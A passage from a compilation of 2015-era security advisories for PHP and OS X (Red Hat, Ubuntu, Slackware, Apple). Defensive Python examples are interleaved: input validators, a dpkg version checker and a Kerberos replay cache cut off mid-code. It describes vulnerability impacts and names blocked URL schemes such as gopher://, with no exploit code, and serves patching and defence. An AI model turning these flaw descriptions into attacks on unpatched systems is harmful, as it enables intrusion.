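        raise RejectedInput('extension %r not allowed' % ext)
    # Rebuild the stem from a character allow-list so nothing odd survives.
    stem = ''.join(ch if ch.isalnum() or ch in '-_' else '_' for ch in stem)[:64] or 'file'
    return stem + ext


def safe_fetch_url(url):
    """Validate a client-supplied URL before handing it to an HTTP client."""
    if '\x00' in url:
        raise RejectedInput('NUL byte in URL')
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_URL_SCHEMES:
        raise RejectedInput('scheme %r not allowed' % parts.scheme)  # blocks file://, gopher://, ...
    if not parts.hostname:
        raise RejectedInput('URL has no host')
    if parts.username or parts.password:
        raise RejectedInput('credentials embedded in URL')
    return url


def is_rejected(check, value):
    """True when `check` refuses `value`; handy for tests and log triage."""
    try:
        check(value)
    except RejectedInput:
        return True
    return False
```

The same rule applies to any other value that crosses from PHP into a C library (paths for fopen(), LDAP filters, exec arguments): reject the NUL at the boundary rather than relying on the library to notice it.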
A NULL pointer dereference flaw was found in PHP's pgsql extension. (CVE-2015-1352)
A flaw was found in the way PHP handled malformed source files when running
in CGI mode. (CVE-2014-9427)
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
5. Package List:
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6):
Source:
php55-2.0-1.el6.src.rpm
php55-php-5.5.21-2.el6.src.rpm
x86_64:
php55-2.0-1.el6.x86_64.rpm
php55-php-5.5.21-2.el6.x86_64.rpm
php55-php-bcmath-5.5.21-2.el6.x86_64.rpm
php55-php-cli-5.5.21-2.el6.x86_64.rpm
php55-php-common-5.5.21-2.el6.x86_64.rpm
php55-php-dba-5.5.21-2.el6.x86_64.rpm
php55-php-debuginfo-5.5.21-2.el6.x86_64.rpm
php55-php-devel-5.5.21-2.el6.x86_64.rpm
php55-php-enchant-5.5.21-2.el6.x86_64.rpm
php55-php-fpm-5.5.21-2.el6.x86_64.rpm
php55-php-gd-5.5.21-2.el6.x86_64.rpm
php55-php-gmp-5.5.21-2.el6.x86_64.rpm
php55-php-imap-5.5.21-2.el6.x86_64.rpm
php55-php-intl-5.5.21-2.el6.x86_64.rpm
php55-php-ldap-5.5.21-2.el6.x86_64.rpm
php55-php-mbstring-5.5.21-2.el6.x86_64.rpm
php55-php-mysqlnd-5.5.21-2.el6.x86_64.rpm
php55-php-odbc-5.5.21-2.el6.x86_64.rpm
php55-php-opcache-5.5.21-2.el6.x86_64.rpm
php55-php-pdo-5.5.21-2.el6.x86_64.rpm
php55-php-pgsql-5.5.21-2.el6.x86_64.rpm
php55-php-process-5.5.21-2.el6.x86_64.rpm
php55-php-pspell-5.5.21-2.el6.x86_64.rpm
php55-php-recode-5.5.21-2.el6.x86_64.rpm
php55-php-snmp-5.5.21-2.el6.x86_64.rpm
php55-php-soap-5.5.21-2.el6.x86_64.rpm
php55-php-tidy-5.5.21-2.el6.x86_64.rpm
php55-php-xml-5.5.21-2.el6.x86_64.rpm
php55-php-xmlrpc-5.5.21-2.el6.x86_64.rpm
php55-runtime-2.0-1.el6.x86_64.rpm
php55-scldevel-2.0-1.el6.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.5):
Source:
php55-2.0-1.el6.src.rpm
php55-php-5.5.21-2.el6.src.rpm
x86_64:
php55-2.0-1.el6.x86_64.rpm
php55-php-5.5.21-2.el6.x86_64.rpm
php55-php-bcmath-5.5.21-2.el6.x86_64.rpm
php55-php-cli-5.5.21-2.el6.x86_64.rpm
php55-php-common-5.5.21-2.el6.x86_64.rpm
php55-php-dba-5.5.21-2.el6.x86_64.rpm
php55-php-debuginfo-5.5.21-2.el6.x86_64.rpm
php55-php-devel-5.5.21-2.el6.x86_64.rpm
php55-php-enchant-5.5.21-2.el6.x86_64.rpm
php55-php-fpm-5.5.21-2.el6.x86_64.rpm
php55-php-gd-5.5.21-2.el6.x86_64.rpm
php55-php-gmp-5.5.21-2.el6.x86_64.rpm
php55-php-imap-5.5.21-2.el6.x86_64.rpm
php55-php-intl-5.5.21-2.el6.x86_64.rpm
php55-php-ldap-5.5.21-2.el6.x86_64.rpm
php55-php-mbstring-5.5.21-2.el6.x86_64.rpm
php55-php-mysqlnd-5.5.21-2.el6.x86_64.rpm
php55-php-odbc-5.5.21-2.el6.x86_64.rpm
php55-php-opcache-5.5.21-2.el6.x86_64.rpm
php55-php-pdo-5.5.21-2.el6.x86_64.rpm
php55-php-pgsql-5.5.21-2.el6.x86_64.rpm
php55-php-process-5.5.21-2.el6.x86_64.rpm
php55-php-pspell-5.5.21-2.el6.x86_64.rpm
php55-php-recode-5.5.21-2.el6.x86_64.rpm
php55-php-snmp-5.5.21-2.el6.x86_64.rpm
php55-php-soap-5.5.21-2.el6.x86_64.rpm
php55-php-tidy-5.5.21-2.el6.x86_64.rpm
php55-php-xml-5.5.21-2.el6.x86_64.rpm
php55-php-xmlrpc-5.5.21-2.el6.x86_64.rpm
php55-runtime-2.0-1.el6.x86_64.rpm
php55-scldevel-2.0-1.el6.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.6):
Source:
php55-2.0-1.el6.src.rpm
php55-php-5.5.21-2.el6.src.rpm
x86_64:
php55-2.0-1.el6.x86_64.rpm
php55-php-5.5.21-2.el6.x86_64.rpm
php55-php-bcmath-5.5.21-2.el6.x86_64.rpm
php55-php-cli-5.5.21-2.el6.x86_64.rpm
php55-php-common-5.5.21-2.el6.x86_64.rpm
php55-php-dba-5.5.21-2.el6.x86_64.rpm
php55-php-debuginfo-5.5.21-2.el6.x86_64.rpm
php55-php-devel-5.5.21-2.el6.x86_64.rpm
php55-php-enchant-5.5.21-2.el6.x86_64.rpm
php55-php-fpm-5.5.21-2.el6.x86_64.rpm
php55-php-gd-5.5.21-2.el6.x86_64.rpm
php55-php-gmp-5.5.21-2.el6.x86_64.rpm
php55-php-imap-5.5.21-2.el6.x86_64.rpm
php55-php-intl-5.5.21-2.el6.x86_64.rpm
php55-php-ldap-5.5.21-2.el6.x86_64.rpm
php55-php-mbstring-5.5.21-2.el6.x86_64.rpm
php55-php-mysqlnd-5.5.21-2.el6.x86_64.rpm
php55-php-odbc-5.5.21-2.el6.x86_64.rpm
php55-php-opcache-5.5.21-2.el6.x86_64.rpm
php55-php-pdo-5.5.21-2.el6.x86_64.rpm
php55-php-pgsql-5.5.21-2.el6.x86_64.rpm
php55-php-process-5.5.21-2.el6.x86_64.rpm
php55-php-pspell-5.5.21-2.el6.x86_64.rpm
php55-php-recode-5.5.21-2.el6.x86_64.rpm
php55-php-snmp-5.5.21-2.el6.x86_64.rpm
php55-php-soap-5.5.21-2.el6.x86_64.rpm
php55-php-tidy-5.5.21-2.el6.x86_64.rpm
php55-php-xml-5.5.21-2.el6.x86_64.rpm
php55-php-xmlrpc-5.5.21-2.el6.x86_64.rpm
php55-runtime-2.0-1.el6.x86_64.rpm
php55-scldevel-2.0-1.el6.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6):
Source:
php55-2.0-1.el6.src.rpm
php55-php-5.5.21-2.el6.src.rpm
x86_64:
php55-2.0-1.el6.x86_64.rpm
php55-php-5.5.21-2.el6.x86_64.rpm
php55-php-bcmath-5.5.21-2.el6.x86_64.rpm
php55-php-cli-5.5.21-2.el6.x86_64.rpm
php55-php-common-5.5.21-2.el6.x86_64.rpm
php55-php-dba-5.5.21-2.el6.x86_64.rpm
php55-php-debuginfo-5.5.21-2.el6.x86_64.rpm
php55-php-devel-5.5.21-2.el6.x86_64.rpm
php55-php-enchant-5.5.21-2.el6.x86_64.rpm
php55-php-fpm-5.5.21-2.el6.x86_64.rpm
php55-php-gd-5.5.21-2.el6.x86_64.rpm
php55-php-gmp-5.5.21-2.el6.x86_64.rpm
php55-php-imap-5.5.21-2.el6.x86_64.rpm
php55-php-intl-5.5.21-2.el6.x86_64.rpm
php55-php-ldap-5.5.21-2.el6.x86_64.rpm
php55-php-mbstring-5.5.21-2.el6.x86_64.rpm
php55-php-mysqlnd-5.5.21-2.el6.x86_64.rpm
php55-php-odbc-5.5.21-2.el6.x86_64.rpm
php55-php-opcache-5.5.21-2.el6.x86_64.rpm
php55-php-pdo-5.5.21-2.el6.x86_64.rpm
php55-php-pgsql-5.5.21-2.el6.x86_64.rpm
php55-php-process-5.5.21-2.el6.x86_64.rpm
php55-php-pspell-5.5.21-2.el6.x86_64.rpm
php55-php-recode-5.5.21-2.el6.x86_64.rpm
php55-php-snmp-5.5.21-2.el6.x86_64.rpm
php55-php-soap-5.5.21-2.el6.x86_64.rpm
php55-php-tidy-5.5.21-2.el6.x86_64.rpm
php55-php-xml-5.5.21-2.el6.x86_64.rpm
php55-php-xmlrpc-5.5.21-2.el6.x86_64.rpm
php55-runtime-2.0-1.el6.x86_64.rpm
php55-scldevel-2.0-1.el6.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7):
Source:
php55-2.0-1.el7.src.rpm
php55-php-5.5.21-2.el7.src.rpm
x86_64:
php55-2.0-1.el7.x86_64.rpm
php55-php-5.5.21-2.el7.x86_64.rpm
php55-php-bcmath-5.5.21-2.el7.x86_64.rpm
php55-php-cli-5.5.21-2.el7.x86_64.rpm
php55-php-common-5.5.21-2.el7.x86_64.rpm
php55-php-dba-5.5.21-2.el7.x86_64.rpm
php55-php-debuginfo-5.5.21-2.el7.x86_64.rpm
php55-php-devel-5.5.21-2.el7.x86_64.rpm
php55-php-enchant-5.5.21-2.el7.x86_64.rpm
php55-php-fpm-5.5.21-2.el7.x86_64.rpm
php55-php-gd-5.5.21-2.el7.x86_64.rpm
php55-php-gmp-5.5.21-2.el7.x86_64.rpm
php55-php-intl-5.5.21-2.el7.x86_64.rpm
php55-php-ldap-5.5.21-2.el7.x86_64.rpm
php55-php-mbstring-5.5.21-2.el7.x86_64.rpm
php55-php-mysqlnd-5.5.21-2.el7.x86_64.rpm
php55-php-odbc-5.5.21-2.el7.x86_64.rpm
php55-php-opcache-5.5.21-2.el7.x86_64.rpm
php55-php-pdo-5.5.21-2.el7.x86_64.rpm
php55-php-pgsql-5.5.21-2.el7.x86_64.rpm
php55-php-process-5.5.21-2.el7.x86_64.rpm
php55-php-pspell-5.5.21-2.el7.x86_64.rpm
php55-php-recode-5.5.21-2.el7.x86_64.rpm
php55-php-snmp-5.5.21-2.el7.x86_64.rpm
php55-php-soap-5.5.21-2.el7.x86_64.rpm
php55-php-xml-5.5.21-2.el7.x86_64.rpm
php55-php-xmlrpc-5.5.21-2.el7.x86_64.rpm
php55-runtime-2.0-1.el7.x86_64.rpm
php55-scldevel-2.0-1.el7.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7):
Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2014-8142
https://access.redhat.com/security/cve/CVE-2014-9427
https://access.redhat.com/security/cve/CVE-2014-9652
https://access.redhat.com/security/cve/CVE-2014-9705
https://access.redhat.com/security/cve/CVE-2014-9709
https://access.redhat.com/security/cve/CVE-2015-0231
https://access.redhat.com/security/cve/CVE-2015-0232
https://access.redhat.com/security/cve/CVE-2015-0273
https://access.redhat.com/security/cve/CVE-2015-1351
https://access.redhat.com/security/cve/CVE-2015-1352
https://access.redhat.com/security/cve/CVE-2015-2301
https://access.redhat.com/security/cve/CVE-2015-2305
https://access.redhat.com/security/cve/CVE-2015-2348
https://access.redhat.com/security/cve/CVE-2015-2787
https://access.redhat.com/security/cve/CVE-2015-4147
https://access.redhat.com/security/cve/CVE-2015-4148
https://access.redhat.com/security/updates/classification/#moderate
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFVcBWDXlSAg2UNWIIRAnzoAJ9qn4wDNXMD8JU1N7k7nEzKlPpGDwCgi0Si
MD3ZncY/P8Pl6+DgQxJQCjo=
=MxfY
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
| VAR-201503-0388 | CVE-2015-1351 | PHP Opcache Extended release vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Use-after-free vulnerability in the _zend_shared_memdup function in zend_shared_alloc.c in the OPcache extension in PHP through 5.6.7 allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors. PHP is prone to a denial-of-service vulnerability due to a use-after-free condition.
An attacker can exploit this issue to crash the affected application, denying service to legitimate users. PHP (PHP: Hypertext Preprocessor) is an open source general-purpose scripting language maintained by the PHP Group and the open source community. OPcache is an extension that improves PHP performance by storing the precompiled bytecode of PHP scripts in shared memory.
============================================================================
Ubuntu Security Notice USN-2501-1
February 17, 2015
php5 vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.10
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
Several security issues were fixed in PHP. Some of these issues, including
CVE-2015-1352, only affected Ubuntu 14.04 LTS and Ubuntu 14.10.
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 14.10:
libapache2-mod-php5 5.5.12+dfsg-2ubuntu4.2
php5-cgi 5.5.12+dfsg-2ubuntu4.2
php5-cli 5.5.12+dfsg-2ubuntu4.2
php5-fpm 5.5.12+dfsg-2ubuntu4.2
php5-pgsql 5.5.12+dfsg-2ubuntu4.2
Ubuntu 14.04 LTS:
libapache2-mod-php5 5.5.9+dfsg-1ubuntu4.6
php5-cgi 5.5.9+dfsg-1ubuntu4.6
php5-cli 5.5.9+dfsg-1ubuntu4.6
php5-fpm 5.5.9+dfsg-1ubuntu4.6
php5-pgsql 5.5.9+dfsg-1ubuntu4.6
Ubuntu 12.04 LTS:
libapache2-mod-php5 5.3.10-1ubuntu3.16
php5-cgi 5.3.10-1ubuntu3.16
php5-cli 5.3.10-1ubuntu3.16
php5-fpm 5.3.10-1ubuntu3.16
php5-pgsql 5.3.10-1ubuntu3.16
In general, a standard system update will make all the necessary changes.
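Acting on the table above means comparing an installed Debian/Ubuntu package version against the fixed version, and plain string comparison gets epochs, '~' pre-release suffixes and multi-digit fields wrong. The script below is an added example, not Ubuntu's tooling; it implements the ordering that dpkg --compare-versions uses (epoch, then upstream version, then Debian revision, with '~' sorting before everything including the end of the string), reads dpkg-query output and reports which packages on a host are still older than the USN-2501-1 versions for Ubuntu 14.04 LTS. The dpkg-query output is constructed for the example.

```python
def _order(ch):
    """Character weight used by dpkg: '~' sorts before everything, even end of string."""
    if ch.isdigit():
        return 0
    if ch.isalpha():
        return ord(ch)
    if ch == '~':
        return -1
    return ord(ch) + 256


def _verrevcmp(a, b):
    """Compare one upstream-version or revision component the way dpkg does."""
    i = j = 0
    while i < len(a) or j < len(b):
        first_diff = 0
        # Non-digit run: compare character weights, end of string counts as 0.
        while (i < len(a) and not a[i].isdigit()) or (j < len(b) and not b[j].isdigit()):
            ac = _order(a[i]) if i < len(a) else 0
            bc = _order(b[j]) if j < len(b) else 0
            if ac != bc:
                return ac - bc
            i += 1
            j += 1
        # Digit run: strip leading zeros; longer run wins, else first differing digit.
        while i < len(a) and a[i] == '0':
            i += 1
        while j < len(b) and b[j] == '0':
            j += 1
        while i < len(a) and a[i].isdigit() and j < len(b) and b[j].isdigit():
            if not first_diff:
                first_diff = ord(a[i]) - ord(b[j])
            i += 1
            j += 1
        if i < len(a) and a[i].isdigit():
            return 1
        if j < len(b) and b[j].isdigit():
            return -1
        if first_diff:
            return first_diff
    return 0


def _split(version):
    """Split [epoch:]upstream[-revision]; missing epoch is 0, missing revision is empty."""
    epoch, rest = 0, version
    if ':' in rest:
        epoch_str, rest = rest.split(':', 1)
        epoch = int(epoch_str)
    upstream, _, revision = rest.rpartition('-') if '-' in rest else (rest, '', '')
    return epoch, upstream, revision


def dpkg_compare(a, b):
    """Return <0, 0 or >0, ordering versions like dpkg --compare-versions."""
    ea, ua, ra = _split(a)
    eb, ub, rb = _split(b)
    return (ea - eb) or _verrevcmp(ua, ub) or _verrevcmp(ra, rb)


def parse_dpkg_query(text):
    r"""Parse `dpkg-query -W -f='${Package} ${Version}\n'` output into {package: version}."""
    installed = {}
    for line in text.splitlines():
        if line.strip():
            pkg, version = line.split()
            installed[pkg] = version
    return installed


def vulnerable_packages(installed, fixed):
    """Installed packages still older than the version the advisory says fixes them."""
    return sorted(pkg for pkg, fix in fixed.items()
                  if pkg in installed and dpkg_compare(installed[pkg], fix) < 0)


# Fixed versions for Ubuntu 14.04 LTS, as listed in USN-2501-1 above.
USN_2501_1_TRUSTY = {
    'libapache2-mod-php5': '5.5.9+dfsg-1ubuntu4.6',
    'php5-cgi': '5.5.9+dfsg-1ubuntu4.6',
    'php5-cli': '5.5.9+dfsg-1ubuntu4.6',
    'php5-fpm': '5.5.9+dfsg-1ubuntu4.6',
    'php5-pgsql': '5.5.9+dfsg-1ubuntu4.6',
}

# Constructed dpkg-query output for a partly patched host (not a real system).
SAMPLE_DPKG_QUERY = """\
libapache2-mod-php5 5.5.9+dfsg-1ubuntu4.5
php5-cli 5.5.9+dfsg-1ubuntu4.6
php5-fpm 5.5.9+dfsg-1ubuntu4.4
php5-gd 5.5.9+dfsg-1ubuntu4.5
"""
```

Feed it the real output of dpkg-query -W -f='${Package} ${Version}\n' on each host; a package that is installed but absent from the result is either already at or above the fixed version or not covered by this notice, and packages the notice does not list (php5-gd in the sample) are deliberately ignored rather than guessed at.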
Here are the details from the Slackware 14.1 ChangeLog:
+--------------------------+
patches/packages/php-5.4.40-i486-1_slack14.1.txz: Upgraded.
This update fixes some security issues.
Please note that this package build also moves the configuration files
from /etc/httpd to /etc, /etc/php.d, and /etc/php-fpm.d.
For more information, see:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9709
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0231
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1351
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1352
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2301
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2305
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2331
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2783
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3330
(* Security fix *)
+--------------------------+
Where to find the new packages:
+-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for
additional mirror sites near you.
Updated package for Slackware 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/php-5.4.40-i486-1_slack14.0.txz
Updated package for Slackware x86_64 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/php-5.4.40-x86_64-1_slack14.0.txz
Updated package for Slackware 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/php-5.4.40-i486-1_slack14.1.txz
Updated package for Slackware x86_64 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/php-5.4.40-x86_64-1_slack14.1.txz
Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-5.6.8-i486-1.txz
Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/php-5.6.8-x86_64-1.txz
MD5 signatures:
+-------------+
Slackware 14.0 package:
2666059d6540b1b4385d25dfc5ebbe99 php-5.4.40-i486-1_slack14.0.txz
Slackware x86_64 14.0 package:
c146f500912ba9c7e5d652e5e3643c04 php-5.4.40-x86_64-1_slack14.0.txz
Slackware 14.1 package:
9efc8a96f9a3f3261e5f640292b1b781 php-5.4.40-i486-1_slack14.1.txz
Slackware x86_64 14.1 package:
2c95e077f314f1cfa3ee83b9aba90b91 php-5.4.40-x86_64-1_slack14.1.txz
Slackware -current package:
30d14f237c71fada0d594c2360a58016 n/php-5.6.8-i486-1.txz
Slackware x86_64 -current package:
1a0fcc590aa4dff5de5f08293936d0d9 n/php-5.6.8-x86_64-1.txz
Installation instructions:
+------------------------+
Upgrade the package as root:
# upgradepkg php-5.4.40-i486-1_slack14.1.txz
Then, restart Apache httpd:
# /etc/rc.d/rc.httpd stop
# /etc/rc.d/rc.httpd start
+-----+
Slackware Linux Security Team
http://slackware.com/gpg-key
security@slackware.com
+------------------------------------------------------------------------+
| To leave the slackware-security mailing list: |
+------------------------------------------------------------------------+
| Send an email to majordomo@slackware.com with this text in the body of |
| the email message: |
| |
| unsubscribe slackware-security |
| |
| You will get a confirmation message back containing instructions to |
| complete the process. Please do not reply to this email address. |
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2015-09-30-3 OS X El Capitan 10.11
OS X El Capitan 10.11 is now available and addresses the following:
Address Book
Available for: Mac OS X v10.6.8 and later
Impact: A local attacker may be able to inject arbitrary code to
processes loading the Address Book framework
Description: An issue existed in Address Book framework's handling
of an environment variable. This issue was addressed through improved
environment variable handling.
CVE-ID
CVE-2015-5897 : Dan Bastone of Gotham Digital Science
AirScan
Available for: Mac OS X v10.6.8 and later
Impact: An attacker with a privileged network position may be able
to extract payload from eSCL packets sent over a secure connection
Description: An issue existed in the processing of eSCL packets.
This issue was addressed through improved validation checks.
CVE-ID
CVE-2015-5853 : an anonymous researcher
apache_mod_php
Available for: Mac OS X v10.6.8 and later
Impact: Multiple vulnerabilities in PHP
Description: Multiple vulnerabilities existed in PHP versions prior
to 5.5.27, including one which may have led to remote code execution.
This issue was addressed by updating PHP to version 5.5.27.
CVE-ID
CVE-2014-9425
CVE-2014-9427
CVE-2014-9652
CVE-2014-9705
CVE-2014-9709
CVE-2015-0231
CVE-2015-0232
CVE-2015-0235
CVE-2015-0273
CVE-2015-1351
CVE-2015-1352
CVE-2015-2301
CVE-2015-2305
CVE-2015-2331
CVE-2015-2348
CVE-2015-2783
CVE-2015-2787
CVE-2015-3329
CVE-2015-3330
Apple Online Store Kit
Available for: Mac OS X v10.6.8 and later
Impact: A malicious application may gain access to a user's keychain
items
Description: An issue existed in validation of access control lists
for iCloud keychain items. This issue was addressed through improved
access control list checks.
CVE-ID
CVE-2015-5836 : XiaoFeng Wang of Indiana University, Luyi Xing of
Indiana University, Tongxin Li of Peking University, Xiaolong Bai of
Tsinghua University
AppleEvents
Available for: Mac OS X v10.6.8 and later
Impact: A user connected through screen sharing can send Apple
Events to a local user's session
Description: An issue existed with Apple Event filtering that
allowed some users to send events to other users. This was addressed
by improved Apple Event handling.
CVE-ID
CVE-2015-5849 : Jack Lawrence (@_jackhl)
Audio
Available for: Mac OS X v10.6.8 and later
Impact: Playing a malicious audio file may lead to an unexpected
application termination
Description: A memory corruption issue existed in the handling of
audio files. This issue was addressed through improved memory
handling.
CVE-ID
CVE-2015-5862 : YoungJin Yoon of Information Security Lab. (Adv.:
Prof. Taekyoung Kwon), Yonsei University, Seoul, Korea
bash
Available for: Mac OS X v10.6.8 and later
Impact: Multiple vulnerabilities in bash
Description: Multiple vulnerabilities existed in bash versions prior
to 3.2 patch level 57. These issues were addressed by updating bash
version 3.2 to patch level 57.
CVE-ID
CVE-2014-6277
CVE-2014-7186
CVE-2014-7187
Certificate Trust Policy
Available for: Mac OS X v10.6.8 and later
Impact: Update to the certificate trust policy
Description: The certificate trust policy was updated. The complete
list of certificates may be viewed at
https://support.apple.com/en-us/HT202858.
CFNetwork Cookies
Available for: Mac OS X v10.6.8 and later
Impact: An attacker in a privileged network position can track a
user's activity
Description: A cross-domain cookie issue existed in the handling of
top level domains. The issue was addressed through improved
restrictions of cookie creation.
CVE-ID
CVE-2015-5885 : Xiaofeng Zheng of Blue Lotus Team, Tsinghua
University
CFNetwork FTPProtocol
Available for: Mac OS X v10.6.8 and later
Impact: Malicious FTP servers may be able to cause the client to
perform reconnaissance on other hosts
Description: An issue existed in the handling of FTP packets when
using the PASV command. This issue was resolved through improved
validation.
CVE-ID
CVE-2015-5912 : Amit Klein
CFNetwork HTTPProtocol
Available for: Mac OS X v10.6.8 and later
Impact: A maliciously crafted URL may be able to bypass HSTS and
leak sensitive data
Description: A URL parsing vulnerability existed in HSTS handling.
This issue was addressed through improved URL parsing.
CVE-ID
CVE-2015-5858 : Xiaofeng Zheng of Blue Lotus Team, Tsinghua
University
CFNetwork HTTPProtocol
Available for: Mac OS X v10.6.8 and later
Impact: A malicious website may be able to track users in Safari
private browsing mode
Description: An issue existed in the handling of HSTS state in
Safari private browsing mode. This issue was addressed through
improved state handling.
CVE-ID
CVE-2015-5860 : Sam Greenhalgh of RadicalResearch Ltd
CFNetwork Proxies
Available for: Mac OS X v10.6.8 and later
Impact: Connecting to a malicious web proxy may set malicious
cookies for a website
Description: An issue existed in the handling of proxy connect
responses. This issue was addressed by removing the set-cookie header
while parsing the connect response.
CVE-ID
CVE-2015-5841 : Xiaofeng Zheng of Blue Lotus Team, Tsinghua
University
CFNetwork SSL
Available for: Mac OS X v10.6.8 and later
Impact: An attacker with a privileged network position may intercept
SSL/TLS connections
Description: A certificate validation issue existed in NSURL when a
certificate changed. This issue was addressed through improved
certificate validation.
CVE-ID
CVE-2015-5824 : Timothy J. Wood of The Omni Group
CFNetwork SSL
Available for: Mac OS X v10.6.8 and later
Impact: An attacker may be able to decrypt data protected by SSL
Description: There are known attacks on the confidentiality of RC4.
An attacker could force the use of RC4, even if the server preferred
better ciphers, by blocking TLS 1.0 and higher connections until
CFNetwork tried SSL 3.0, which only allows RC4. This issue was
addressed by removing the fallback to SSL 3.0.
CoreCrypto
Available for: Mac OS X v10.6.8 and later
Impact: An attacker may be able to determine a private key
Description: By observing many signing or decryption attempts, an
attacker may have been able to determine the RSA private key. This
issue was addressed using improved encryption algorithms.
CoreText
Available for: Mac OS X v10.6.8 and later
Impact: Processing a maliciously crafted font file may lead to
arbitrary code execution
Description: A memory corruption issue existed in the processing of
font files. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-5874 : John Villamil (@day6reak), Yahoo Pentest Team
Dev Tools
Available for: Mac OS X v10.6.8 and later
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A memory corruption issue existed in dyld. This was
addressed through improved memory handling.
CVE-ID
CVE-2015-5876 : beist of grayhash
Dev Tools
Available for: Mac OS X v10.6.8 and later
Impact: An application may be able to bypass code signing
Description: An issue existed with validation of the code signature
of executables. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2015-5839 : @PanguTeam
Disk Images
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue existed in DiskImages. This
issue was addressed through improved memory handling.
CVE-ID
CVE-2015-5847 : Filippo Bigarella, Luca Todesco
dyld
Available for: Mac OS X v10.6.8 and later
Impact: An application may be able to bypass code signing
Description: An issue existed with validation of the code signature
of executables. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2015-5839 : TaiG Jailbreak Team
EFI
Available for: Mac OS X v10.6.8 and later
Impact: A malicious application can prevent some systems from
booting
Description: An issue existed with the addresses covered by the
protected range register. This issue was fixed by changing the
protected range.
CVE-ID
CVE-2015-5900 : Xeno Kovah & Corey Kallenberg from LegbaCore
EFI
Available for: Mac OS X v10.6.8 and later
Impact: A malicious Apple Ethernet Thunderbolt adapter may be able
to affect firmware flashing
Description: Apple Ethernet Thunderbolt adapters could modify the
host firmware if connected during an EFI update. This issue was
addressed by not loading option ROMs during updates.
CVE-ID
CVE-2015-5914 : Trammell Hudson of Two Sigma Investments and snare
Finder
Available for: Mac OS X v10.6.8 and later
Impact: The "Secure Empty Trash" feature may not securely delete
files placed in the Trash
Description: An issue existed in guaranteeing secure deletion of
Trash files on some systems, such as those with flash storage. This
issue was addressed by removing the "Secure Empty Trash" option.
CVE-ID
CVE-2015-5901 : Apple
Game Center
Available for: Mac OS X v10.6.8 and later
Impact: A malicious Game Center application may be able to access a
player's email address
Description: An issue existed in Game Center in the handling of a
player's email. This issue was addressed through improved access
restrictions.
CVE-ID
CVE-2015-5855 : Nasser Alnasser
Heimdal
Available for: Mac OS X v10.6.8 and later
Impact: An attacker may be able to replay Kerberos credentials to
the SMB server
Description: An authentication issue existed in Kerberos
credentials. This issue was addressed through additional validation
of credentials using a list of recently seen credentials.
CVE-ID
CVE-2015-5913 : Tarun Chopra of Microsoft Corporation, U.S. and Yu
Fan of Microsoft Corporation, China
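The mechanism the Heimdal entry describes, a list of recently seen credentials, as an added example that is not Heimdal's code: a Python replay cache for Kerberos AP-REQ authenticators, keyed on client principal, ctime and cusec, that rejects any authenticator presented a second time inside the allowed clock-skew window and any whose timestamp falls outside that window. The five-minute skew (the value RFC 4120 suggests), the injectable clock and the sample principals are assumptions made for this illustration.

```python
"""Replay cache for Kerberos AP-REQ authenticators.

Added example, not Heimdal's implementation. An acceptor that keeps the
authenticators it has recently seen can reject a captured AP-REQ that is
presented a second time; the clock-skew window bounds how long entries
must be remembered, because an authenticator older than the window is
rejected by the freshness check alone. The skew value, the injectable
clock and the sample principals are assumptions of this example.
"""
import heapq
import time


class ReplayCache:
    def __init__(self, skew_seconds=300, now=time.time):
        self.skew = skew_seconds
        self.now = now            # injectable clock, so tests can move time
        self.seen = set()         # (client, ctime, cusec) inside the window
        self.expiry_heap = []     # (expiry time, key), smallest expiry first

    def _evict(self, t):
        """Forget authenticators that can no longer pass the freshness check."""
        while self.expiry_heap and self.expiry_heap[0][0] < t:
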